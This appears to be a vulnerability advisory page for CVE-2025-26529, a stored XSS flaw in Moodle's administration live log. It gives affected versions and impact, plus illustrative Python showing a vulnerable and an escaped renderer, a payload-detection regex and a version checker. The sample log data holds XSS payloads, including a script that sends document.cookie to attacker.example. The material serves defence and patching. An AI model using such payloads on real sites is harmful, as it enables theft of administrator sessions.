Stored XSS Vulnerability in Moodle's Administration Live Log
CVE-2025-26529
Key Information:
- Vendor: Moodle Project
- CVE Published: 24 February 2025
What is CVE-2025-26529?
CVE-2025-26529 is a stored cross-site scripting (XSS) vulnerability in the site administration live log of Moodle, the learning management system used by educational institutions worldwide to manage and deliver online courses. The description information shown for each log entry was not sufficiently sanitised before being displayed. Because that description can carry attacker-influenced content, an attacker can plant a script that executes in the browser of any user who views the live log. Since the live log is an administration page, the users most likely to trigger the payload are administrators, so a successful attack can expose sensitive data and undermine the integrity of user interactions within Moodle.
Technical Details
This vulnerability is a stored XSS issue: the Administration Live Log feature renders log entry descriptions without adequate output sanitisation. An attacker who can get script markup into a logged description does not need the victim to click a crafted link; the payload is persisted with the log entry and runs whenever an administrator or other authorised user views the log. Scripts executing in an administrator's browser session can perform privileged actions on the administrator's behalf or capture credentials and session tokens, which is what makes an otherwise medium-severity XSS in an admin-only page worth patching promptly.
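The sink and the fix, shown as an added example that is not Moodle's code: the vulnerable renderer interpolates the untrusted description field straight into table markup, the hardened renderer HTML-escapes every untrusted field for the text/attribute context before interpolation, and a small scan flags stored descriptions that already carry tag or event-handler markup. The log entries and field names are constructed for this illustration and do not correspond to Moodle's actual logstore schema.

```python
import html
import re

# Constructed sample log entries (not real Moodle data). The "description"
# field is the attacker-influenced text; the other fields are trusted here.
SAMPLE_ENTRIES = [
    {"time": "2025-02-24 10:00:01", "user": "admin", "event": "Course viewed",
     "description": "The user with id '2' viewed the course with id '3'."},
    {"time": "2025-02-24 10:00:07", "user": "student7", "event": "Course module created",
     "description": "The user created the module named "
                    "'<img src=x onerror=\"alert(document.cookie)\">'."},
    {"time": "2025-02-24 10:00:12", "user": "student7", "event": "Forum post created",
     "description": "Post titled '<script>fetch(\"https://attacker.example/?c=\"+document.cookie)</script>' created."},
]

_ROW_TEMPLATE = ("<tr><td>{time}</td><td>{user}</td><td>{event}</td>"
                 "<td>{description}</td></tr>")


def render_row_vulnerable(entry):
    """Interpolates raw fields into markup: the stored-XSS sink."""
    return _ROW_TEMPLATE.format(**entry)


def render_row_hardened(entry):
    """Escapes every untrusted field (&, <, >, quotes) before interpolation.
    The text the viewer sees is unchanged; only the markup meaning is removed."""
    escaped = {k: html.escape(str(v), quote=True) for k, v in entry.items()}
    return _ROW_TEMPLATE.format(**escaped)


def render_log(entries, hardened=True):
    render = render_row_hardened if hardened else render_row_vulnerable
    return "<table>" + "".join(render(e) for e in entries) + "</table>"


# Any element other than the ones the template itself emits came from data.
_FOREIGN_TAG_RE = re.compile(r"<(?!/?(?:table|tr|td)\b)[a-zA-Z][^>]*>")


def contains_injected_markup(rendered_html):
    """True when the rendered output contains markup that the template did not
    emit, i.e. markup that originated in an entry field."""
    return _FOREIGN_TAG_RE.search(rendered_html) is not None


# Detection over stored data: tags, inline event handlers, javascript: URLs.
_PAYLOAD_RE = re.compile(r"<\s*[a-zA-Z/!]|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)


def find_suspicious_descriptions(entries):
    """Indexes of entries whose stored description already carries markup that
    would execute if rendered without escaping. Use this to triage existing
    log rows after upgrading, since the fix only changes how they are displayed."""
    return [i for i, e in enumerate(entries) if _PAYLOAD_RE.search(e["description"])]


if __name__ == "__main__":
    print(render_log(SAMPLE_ENTRIES, hardened=False))
    print(render_log(SAMPLE_ENTRIES, hardened=True))
    print("suspicious rows:", find_suspicious_descriptions(SAMPLE_ENTRIES))
```

Escaping at the point of output is the right layer: the raw description still has to be stored faithfully for auditing, so the fix is to neutralise it when it is rendered into HTML, not to strip it from the log. Note that the scan is a triage aid, not a filter; the hardened renderer must escape everything regardless of what the scan finds.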
Potential impact of CVE-2025-26529
- User Compromise: Attackers can execute scripts that target users' sessions, leading to unauthorised access to accounts and sensitive information. The risk is particularly acute because the live log is an administration page, so the victims are likely to be administrators with the highest privileges.
- Data Integrity Threats: A script running in the log viewer can alter what the viewing administrator sees, which lets an attacker conceal their activity from the very log data used for monitoring and auditing, undermining its reliability.
- Reputation and Trust Erosion: Exploitation could cause significant reputational damage for institutions relying on Moodle for e-learning. Breaches involving sensitive user data erode trust in the platform's security and may prompt users to seek alternatives.
Affected Version(s)
- Moodle 4.5.0 to 4.5.1 (fixed in 4.5.2)
- Moodle 4.4.0 to 4.4.5 (fixed in 4.4.6)
- Moodle 4.3.0 to 4.3.9 (fixed in 4.3.10)
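A version check against the ranges listed above, added here as an example and not part of the page or the Moodle project: it parses a Moodle release string, reports whether that release falls in an affected range, and returns an explicit "unknown" for release branches the list does not cover rather than silently treating them as safe. The `version.php` fragment is constructed for the example; real installs define `$release` in that file with the same general shape.

```python
import re

# Affected ranges exactly as listed above: [first affected, first fixed).
AFFECTED_RANGES = {
    (4, 5): ((4, 5, 0), (4, 5, 2)),
    (4, 4): ((4, 4, 0), (4, 4, 6)),
    (4, 3): ((4, 3, 0), (4, 3, 10)),
}

# Constructed sample of a Moodle version.php $release line (not a real install).
SAMPLE_VERSION_PHP = """<?php
$version  = 2024042205.01;
$release  = '4.4.5+ (Build: 20250110)';
$branch   = '404';
"""


def parse_version(text):
    """'4.4.5', '4.4.5+ (Build: 20250110)', '4.5' -> (major, minor, patch)."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError("unrecognised version string: %r" % text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_weekly_build(text):
    """Moodle marks post-release weekly builds with a '+' suffix (e.g. 4.4.5+).
    Such a build may or may not already contain a fix shipped in the next
    point release, so it is reported as affected unless verified otherwise."""
    return re.match(r"\s*\d+\.\d+(?:\.\d+)?\+", text) is not None


def is_affected(release_text):
    """True/False for the branches listed on this page; None when the branch
    (e.g. 4.1 or 4.2) is not listed, meaning 'check the vendor advisory',
    not 'safe'."""
    v = parse_version(release_text)
    rng = AFFECTED_RANGES.get(v[:2])
    if rng is None:
        return None
    low, high = rng
    return low <= v < high


def release_from_version_php(source):
    """Extracts the $release string from the contents of Moodle's version.php."""
    m = re.search(r"\$release\s*=\s*'([^']*)'", source)
    if not m:
        raise ValueError("$release not found")
    return m.group(1)


def assess_install(version_php_source):
    """Returns (release, verdict) where verdict is 'affected', 'fixed' or 'unknown'."""
    release = release_from_version_php(version_php_source)
    result = is_affected(release)
    verdict = "unknown" if result is None else ("affected" if result else "fixed")
    return release, verdict


if __name__ == "__main__":
    print(assess_install(SAMPLE_VERSION_PHP))
```

In practice the release string is read from `version.php` in the Moodle root; the check deliberately treats a `+` weekly build of the last unfixed point release as affected, since the only safe assumption without the changelog is that the fix is not yet in.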
Exploit Proof of Concept (PoC)
No proof-of-concept code is reproduced on this page. PoC code is written by security researchers to demonstrate that a vulnerability can be exploited; it is also a key component of weaponisation, and for a stored XSS in an administration page the realistic follow-on is takeover of an administrator session rather than a direct path to ransomware.
News Articles
- Cross-site Scripting (XSS) in moodle/moodle | CVE-2025-26529 | Snyk: Medium severity (5.8) Cross-site Scripting (XSS) in moodle/moodle | CVE-2025-26529
- Understanding and Mitigating CVE-2025-26529: Stored XSS Risk in Moodle's Admin Live Log: Explore CVE-2025-26529, a critical XSS vulnerability in Moodle's admin live log, and effective measures to mitigate it.
- CVE-2025-26529 (Debian Security Tracker): Description information displayed in the site administration live log required additional sanitizing to prevent a stored XSS risk. Source: CVE (at NVD; CERT, LWN, oss-sec, fulldisc, ...)
Timeline
- First article discovered by Debian Security Tracker
- Vulnerability started trending
- Public PoC available
- Exploit known to exist
- Vulnerability published
- Vulnerability reserved